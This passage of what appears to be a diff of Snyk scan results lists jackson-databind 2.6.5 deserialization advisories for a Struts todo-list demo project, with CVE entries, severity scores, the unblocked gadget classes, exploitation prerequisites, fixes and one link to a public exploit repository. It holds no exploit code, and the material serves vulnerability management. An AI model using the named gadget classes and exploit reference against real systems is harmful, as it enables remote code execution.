"cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.931793Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariDataSource` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-14540.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2449)\n", + "epssDetails": { + "percentile": "0.71702", + "probability": "0.00342", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16335" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-85cw-hj65-qqv9" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:06.837179Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:30:24Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:30:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.931793Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "iSafeBlue" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/LeadroyaL/cve-2019-14540-exploit", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2410", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:42.892322Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:47.850814Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.008832Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.zaxxer.hikari.HikariConfig` was not blocked.\r\n**Note:** This is a different vulnerability than CVE-2019-16335.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [Exploit](https://github.com/LeadroyaL/cve-2019-14540-exploit)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2410)\n", + "epssDetails": { + "percentile": "0.74104", + "probability": "0.00410", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14540" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-h822-r4r5-v8jg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T13:03:10.401907Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr2)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-15T23:27:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:27:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.008832Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2420", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:32.899468Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T14:43:42.115110Z", + "functions_new": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-16T14:37:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T14:37:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:32.899468Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:50.462784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16942" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx7p-6679-8g3q" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:02:18.178548Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.988000Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.814203Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16943" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fmmc-742q-jg75" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:03:39.391997Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.024581Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 